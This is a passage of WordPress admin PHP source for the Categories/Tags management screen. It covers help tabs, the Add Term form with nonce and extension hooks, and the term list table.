Categories. Link Category names must be unique and Link Categories are separate from the categories you use for posts.' ) . '</p>'; } else { $help = '<p>' . __( 'You can assign keywords to your posts using <strong>tags</strong>. Unlike categories, tags have no hierarchy, meaning there is no relationship from one tag to another.' ) . '</p>'; } if ( 'link_category' === $taxonomy ) { $help .= '<p>' . __( 'You can delete Link Categories in the Bulk Action pull-down, but that action does not delete the links within the category. Instead, it moves them to the default Link Category.' ) . '</p>'; } else { $help .= '<p>' . __( 'What’s the difference between categories and tags? Normally, tags are ad-hoc keywords that identify important information in your post (names, subjects, etc) that may or may not recur in other posts, while categories are pre-determined sections. If you think of your site like a book, the categories are like the Table of Contents and the tags are like the terms in the index.' ) . '</p>'; } get_current_screen()->add_help_tab( array( 'id' => 'overview', 'title' => __( 'Overview' ), 'content' => $help, ) ); if ( 'category' === $taxonomy || 'post_tag' === $taxonomy ) { if ( 'category' === $taxonomy ) { $help = '<p>' . __( 'When adding a new category on this screen, you’ll fill in the following fields:' ) . '</p>'; } else { $help = '<p>' . __( 'When adding a new tag on this screen, you’ll fill in the following fields:' ) . '</p>'; } $help .= '<ul>' . '<li>' . __( '<strong>Name</strong> — The name is how it appears on your site.' ) . '</li>'; $help .= '<li>' . __( '<strong>Slug</strong> — The “slug” is the URL-friendly version of the name. It is usually all lowercase and contains only letters, numbers, and hyphens.' ) . '</li>'; if ( 'category' === $taxonomy ) { $help .= '<li>' . __( '<strong>Parent</strong> — Categories, unlike tags, can have a hierarchy. You might have a Jazz category, and under that have child categories for Bebop and Big Band. Totally optional. To create a subcategory, just choose another category from the Parent dropdown.' ) . '</li>'; } $help .= '<li>' . __( '<strong>Description</strong> — The description is not prominent by default; however, some themes may display it.' ) . '</li>' . '</ul>' . '<p>' . __( 'You can change the display of this screen using the Screen Options tab to set how many items are displayed per screen and to display/hide columns in the table.' ) . '</p>'; get_current_screen()->add_help_tab( array( 'id' => 'adding-terms', 'title' => 'category' === $taxonomy ? __( 'Adding Categories' ) : __( 'Adding Tags' ), 'content' => $help, ) ); } $help = '<p><strong>' . __( 'For more information:' ) . '</strong></p>'; if ( 'category' === $taxonomy ) { $help .= '<p>' . __( '<a href="https://wordpress.org/documentation/article/posts-categories-screen/">Documentation on Categories</a>' ) . '</p>'; } elseif ( 'link_category' === $taxonomy ) { $help .= '<p>' . __( '<a href="https://codex.wordpress.org/Links_Link_Categories_Screen">Documentation on Link Categories</a>' ) . '</p>'; } else { $help .= '<p>' . __( '<a href="https://wordpress.org/documentation/article/posts-tags-screen/">Documentation on Tags</a>' ) . '</p>'; } $help .= '<p>' . __( '<a href="https://wordpress.org/support/forums/">Support forums</a>' ) . '</p>'; get_current_screen()->set_help_sidebar( $help ); unset( $help ); } require_once ABSPATH . 'wp-admin/admin-header.php'; // Also used by the Edit Tag form. require_once ABSPATH . 'wp-admin/includes/edit-tag-messages.php'; $class = ( isset( $_REQUEST['error'] ) ) ? 'error' : 'updated'; if ( is_plugin_active( 'wpcat2tag-importer/wpcat2tag-importer.php' ) ) { $import_link = admin_url( 'admin.php?import=wpcat2tag' ); } else { $import_link = admin_url( 'import.php' ); } ?> <div class="wrap nosubsub"> <h1 class="wp-heading-inline"><?php echo esc_html( $title ); ?></h1> <?php if ( isset( $_REQUEST['s'] ) && strlen( $_REQUEST['s'] ) ) { echo '<span class="subtitle">'; printf( /* translators: %s: Search query. */ __( 'Search results for: %s' ), '<strong>' . esc_html( wp_unslash( $_REQUEST['s'] ) ) . '</strong>' ); echo '</span>'; } ?> <hr class="wp-header-end"> <?php if ( $message ) : wp_admin_notice( $message, array( 'id' => 'message', 'additional_classes' => array( $class ), 'dismissible' => true, ) ); $_SERVER['REQUEST_URI'] = remove_query_arg( array( 'message', 'error' ), $_SERVER['REQUEST_URI'] ); endif; ?> <div id="ajax-response"></div> <form class="search-form wp-clearfix" method="get"> <input type="hidden" name="taxonomy" value="<?php echo esc_attr( $taxonomy ); ?>" /> <input type="hidden" name="post_type" value="<?php echo esc_attr( $post_type ); ?>" /> <?php $wp_list_table->search_box( $tax->labels->search_items, 'tag' ); ?> </form> <?php $can_edit_terms = current_user_can( $tax->cap->edit_terms ); if ( $can_edit_terms ) { ?> <div id="col-container" class="wp-clearfix"> <div id="col-left"> <div class="col-wrap"> <?php if ( 'category' === $taxonomy ) { /** * Fires before the Add Category form. * * @since 2.1.0 * @deprecated 3.0.0 Use {@see '{$taxonomy}_pre_add_form'} instead. * * @param object $arg Optional arguments cast to an object. */ do_action_deprecated( 'add_category_form_pre', array( (object) array( 'parent' => 0 ) ), '3.0.0', '{$taxonomy}_pre_add_form' ); } elseif ( 'link_category' === $taxonomy ) { /** * Fires before the link category form. * * @since 2.3.0 * @deprecated 3.0.0 Use {@see '{$taxonomy}_pre_add_form'} instead. * * @param object $arg Optional arguments cast to an object. */ do_action_deprecated( 'add_link_category_form_pre', array( (object) array( 'parent' => 0 ) ), '3.0.0', '{$taxonomy}_pre_add_form' ); } else { /** * Fires before the Add Tag form. * * @since 2.5.0 * @deprecated 3.0.0 Use {@see '{$taxonomy}_pre_add_form'} instead. * * @param string $taxonomy The taxonomy slug. */ do_action_deprecated( 'add_tag_form_pre', array( $taxonomy ), '3.0.0', '{$taxonomy}_pre_add_form' ); } /** * Fires before the Add Term form for all taxonomies. * * The dynamic portion of the hook name, `$taxonomy`, refers to the taxonomy slug. * * Possible hook names include: * * - `category_pre_add_form` * - `post_tag_pre_add_form` * * @since 3.0.0 * * @param string $taxonomy The taxonomy slug. */ do_action( "{$taxonomy}_pre_add_form", $taxonomy ); ?> <div class="form-wrap"> <h2><?php echo $tax->labels->add_new_item; ?></h2> <form id="addtag" method="post" action="edit-tags.php" class="validate" <?php /** * Fires inside the Add Tag form tag. * * The dynamic portion of the hook name, `$taxonomy`, refers to the taxonomy slug. * * Possible hook names include: * * - `category_term_new_form_tag` * - `post_tag_term_new_form_tag` * * @since 3.7.0 */ do_action( "{$taxonomy}_term_new_form_tag" ); ?> > <input type="hidden" name="action" value="add-tag" /> <input type="hidden" name="screen" value="<?php echo esc_attr( $current_screen->id ); ?>" /> <input type="hidden" name="taxonomy" value="<?php echo esc_attr( $taxonomy ); ?>" /> <input type="hidden" name="post_type" value="<?php echo esc_attr( $post_type ); ?>" /> <?php wp_nonce_field( 'add-tag', '_wpnonce_add-tag' ); ?> <div class="form-field form-required term-name-wrap"> <label for="tag-name"><?php _ex( 'Name', 'term name' ); ?></label> <input name="tag-name" id="tag-name" type="text" value="" size="40" aria-required="true" aria-describedby="name-description" /> <p id="name-description"><?php echo $tax->labels->name_field_description; ?></p> </div> <div class="form-field term-slug-wrap"> <label for="tag-slug"><?php _e( 'Slug' ); ?></label> <input name="slug" id="tag-slug" type="text" value="" size="40" aria-describedby="slug-description" /> <p id="slug-description"><?php echo $tax->labels->slug_field_description; ?></p> </div> <?php if ( is_taxonomy_hierarchical( $taxonomy ) ) : ?> <div class="form-field term-parent-wrap"> <label for="parent"><?php echo esc_html( $tax->labels->parent_item ); ?></label> <?php $dropdown_args = array( 'hide_empty' => 0, 'hide_if_empty' => false, 'taxonomy' => $taxonomy, 'name' => 'parent', 'orderby' => 'name', 'hierarchical' => true, 'show_option_none' => __( 'None' ), ); /** * Filters the taxonomy parent drop-down on the Edit Term page. * * @since 3.7.0 * @since 4.2.0 Added `$context` parameter. * * @param array $dropdown_args { * An array of taxonomy parent drop-down arguments. * * @type int|bool $hide_empty Whether to hide terms not attached to any posts. Default 0. * @type bool $hide_if_empty Whether to hide the drop-down if no terms exist. Default false. * @type string $taxonomy The taxonomy slug. * @type string $name Value of the name attribute to use for the drop-down select element. * Default 'parent'. * @type string $orderby The field to order by. Default 'name'. * @type bool $hierarchical Whether the taxonomy is hierarchical. Default true. * @type string $show_option_none Label to display if there are no terms. Default 'None'. * } * @param string $taxonomy The taxonomy slug. * @param string $context Filter context. Accepts 'new' or 'edit'. */ $dropdown_args = apply_filters( 'taxonomy_parent_dropdown_args', $dropdown_args, $taxonomy, 'new' ); $dropdown_args['aria_describedby'] = 'parent-description'; wp_dropdown_categories( $dropdown_args ); ?> <?php if ( 'category' === $taxonomy ) : ?> <p id="parent-description"><?php _e( 'Categories, unlike tags, can have a hierarchy. You might have a Jazz category, and under that have children categories for Bebop and Big Band. Totally optional.' ); ?></p> <?php else : ?> <p id="parent-description"><?php echo $tax->labels->parent_field_description; ?></p> <?php endif; ?> </div> <?php endif; // is_taxonomy_hierarchical() ?> <div class="form-field term-description-wrap"> <label for="tag-description"><?php _e( 'Description' ); ?></label> <textarea name="description" id="tag-description" rows="5" cols="40" aria-describedby="description-description"></textarea> <p id="description-description"><?php echo $tax->labels->desc_field_description; ?></p> </div> <?php if ( ! is_taxonomy_hierarchical( $taxonomy ) ) { /** * Fires after the Add Tag form fields for non-hierarchical taxonomies. * * @since 3.0.0 * * @param string $taxonomy The taxonomy slug. */ do_action( 'add_tag_form_fields', $taxonomy ); } /** * Fires after the Add Term form fields. * * The dynamic portion of the hook name, `$taxonomy`, refers to the taxonomy slug. * * Possible hook names include: * * - `category_add_form_fields` * - `post_tag_add_form_fields` * * @since 3.0.0 * * @param string $taxonomy The taxonomy slug. */ do_action( "{$taxonomy}_add_form_fields", $taxonomy ); ?> <p class="submit"> <?php submit_button( $tax->labels->add_new_item, 'primary', 'submit', false ); ?> <span class="spinner"></span> </p> <?php if ( 'category' === $taxonomy ) { /** * Fires at the end of the Edit Category form. * * @since 2.1.0 * @deprecated 3.0.0 Use {@see '{$taxonomy}_add_form'} instead. * * @param object $arg Optional arguments cast to an object. */ do_action_deprecated( 'edit_category_form', array( (object) array( 'parent' => 0 ) ), '3.0.0', '{$taxonomy}_add_form' ); } elseif ( 'link_category' === $taxonomy ) { /** * Fires at the end of the Edit Link form. * * @since 2.3.0 * @deprecated 3.0.0 Use {@see '{$taxonomy}_add_form'} instead. * * @param object $arg Optional arguments cast to an object. */ do_action_deprecated( 'edit_link_category_form', array( (object) array( 'parent' => 0 ) ), '3.0.0', '{$taxonomy}_add_form' ); } else { /** * Fires at the end of the Add Tag form. * * @since 2.7.0 * @deprecated 3.0.0 Use {@see '{$taxonomy}_add_form'} instead. * * @param string $taxonomy The taxonomy slug. */ do_action_deprecated( 'add_tag_form', array( $taxonomy ), '3.0.0', '{$taxonomy}_add_form' ); } /** * Fires at the end of the Add Term form for all taxonomies. * * The dynamic portion of the hook name, `$taxonomy`, refers to the taxonomy slug. * * Possible hook names include: * * - `category_add_form` * - `post_tag_add_form` * * @since 3.0.0 * * @param string $taxonomy The taxonomy slug. */ do_action( "{$taxonomy}_add_form", $taxonomy ); ?> </form></div> </div> </div><!-- /col-left --> <div id="col-right"> <div class="col-wrap"> <?php } ?> <?php $wp_list_table->views(); ?> <form id="posts-filter" method="post"> <input type="hidden" name="taxonomy" value="<?php echo esc_attr( $taxonomy ); ?>" /> <input type="hidden" name="post_type" value="<?php echo esc_attr( $post_type ); ?>" /> <?php $wp_list_table->display(); ?> </form> <?php if ( 'category' === $taxonomy ) : ?> <div class="form-wrap edit-term-notes"> <p> <?php printf( /* translators: %s: Default category. */ __( 'Deleting a category does not delete the posts in that category. Instead, posts that were only assigned to the deleted category are set to the default category %s. The default category cannot be deleted.' ), /** This filter is documented in wp-includes/category-template.php */ '<strong>' . apply_filters( 'the_category', get_cat_name( get_option( 'default_category' ) ), '', '' ) . '</strong>' ); ?> </p> <?php if ( current_user_can( 'import' ) ) : ?> <p> <?php printf( /* translators: %s: URL to Categories to Tags Converter tool. */ __( 'Categories can be selectively converted to tags using the <a href="%s">category to tag converter</a>.' ), esc_url( $import_link ) ); ?> </p> <?php endif; ?> </div> <?php elseif ( 'post_tag' === $taxonomy && current_user_can( 'import' ) ) : ?> <div class="form-wrap edit-term-notes"> <p> <?php printf( /* translators: %s: URL to Categories to Tags Converter tool. */ __( 'Tags can be selectively converted to categories using the <a href="%s">tag to category converter</a>.' ), esc_url( $import_link ) ); ?> </p> </div> <?php endif; /** * Fires after the taxonomy list table. * * The dynamic portion of the hook name, `$taxonomy`, refers to the taxonomy slug. * * Possible hook names include: * * - `after-category-table` * - `after-post_tag-table` * * @since 3.0.0 * * @param string $taxonomy The taxonomy name. */ do_action( "after-{$taxonomy}-table", $taxonomy ); // phpcs:ignore WordPress.NamingConventions.ValidHookName.UseUnderscores if ( $can_edit_terms ) { ?> </div> </div><!-- /col-right --> </div><!-- /col-container --> <?php } ?> </div><!-- /wrap --> <?php if ( ! wp_is_mobile() ) : ?> <script type="text/javascript"> try{document.forms.addtag['tag-name'].focus();}catch(e){} </script> <?php endif; $wp_list_table->inline_edit(); require_once ABSPATH . 'wp-admin/admin-footer.php'; Save